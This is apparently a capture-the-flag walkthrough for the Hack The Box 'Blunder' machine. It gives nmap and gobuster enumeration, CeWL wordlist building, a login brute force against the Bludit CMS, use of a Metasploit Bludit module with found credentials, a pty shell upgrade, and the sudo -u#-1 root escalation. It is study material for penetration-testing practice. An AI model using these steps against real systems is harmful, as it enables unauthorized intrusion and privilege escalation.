Information Gathering and Enumeration:
sudo nmap -A -T4 10.10.10.191 -oN nmap_blunder
-A = Enable OS detection, version detection, script scanning, and traceroute.
-T4 = Set timing template (higher is faster).
-oN =output to file as Normal.
nmap_blunder = output file.
#Directory busting using gobuster:
gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt -x txt,php 2>/dev/null
dir = Uses directory/file brute-forcing mode.
-u = host to be scanned.
-w = wordlist directory.
-x = files to look for.
2>/dev/null = redirects errors to null directory to reduce unwanted outputs.
#Visit interesting directories like /admin, /robots.txt, /todo.txt:
#Intercept login traffic using BurpSuite:
A CSRF token is a unique, secret, unpredictable value that is generated by the server-side application and transmitted to the client in such a way that it is included in a subsequent HTTP request made by the client.
#Python script for brute forcing CSRF Token:
#Generating password wordlist from the webpage using CEWL:
CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.
cewl -w wordlist.txt -d 10 -m 7 http://10.10.10.191
-w = Write the output to the file.
- d = Depth to spider to, default 2
-m = Minimum word length, default 3.
#Brute forcing the login page http://10.10.10.191/admin/login
Run python script.
#Login to the Web page using the credentials gathered.
#Check for existing exploits for Bludit:
Search for existing exploits in kali repositories
Search exploit in metasploit
search bludit type:exploit
Gather information about the exploit
#Use exploit module and configure options:
set rhosts 10.10.10.191
set lhost tun0
set BLUDITUSER fergus
set BLUDITPASS RolandDeschain
Post exploitation and privilege escalation:
#Go to shell and improve it using python:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
#Look for the user and root flag:
#Look for credentials for the users hugo or shaun:
Look for SSH username/password:
#Let’s cheat for a bit and locate users.php
#Crack the password hash using online hash cracking sites:
#Switch user from www-data to hugo:
Check privilege using sudo -l command.
#Locate and Read flags:
#Escalate privilege to access root flag:
sudo -l = list user’s privileges or check a specific command.
sudo -u#-1 /bin/bash
-u = run command (or edit file) as specified user name or ID.
#-1 = a bug/exploit that allows to execute command as root.
Bludit - Flat-File CMS
Create your own Website or Blog in seconds Simple, Fast, Secure, Flat-File CMS Bludit uses files in JSON format to…
CSRF tokens | Web Security Academy
In this section, we'll explain what CSRF tokens are, how they protect against CSRF attacks, and how CSRF tokens should…